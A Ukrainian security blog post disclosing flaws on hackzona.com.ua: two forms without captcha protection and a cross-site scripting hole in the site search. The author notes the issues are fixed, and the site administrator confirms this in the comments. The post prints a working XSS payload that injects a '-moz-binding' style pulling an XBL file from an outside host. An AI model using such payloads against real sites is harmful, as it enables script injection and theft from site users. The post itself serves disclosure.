Уразливості на hackzona.com.ua

15:20 14.03.2011

25.10.2010

У березні, 21.03.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на секюріті проекті http://hackzona.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

14.03.2011

Insufficient Anti-automation:

http://hackzona.com.ua/hz.php?name=Feedback
http://hackzona.com.ua/hz.php?name=NLbook

В даних формах немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://hackzona.com.ua/hz.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Дані уразливості вже виправлені.


2 відповідей на “Уразливості на hackzona.com.ua”

  1. Dementor каже:

    Дякую, fixed

  2. MustLive каже:

    Завжди будь ласка.

    Як я нещодавно перевірив, дані уразливості якісно виправлені.

Leave a Reply

You must be logged in to post a comment.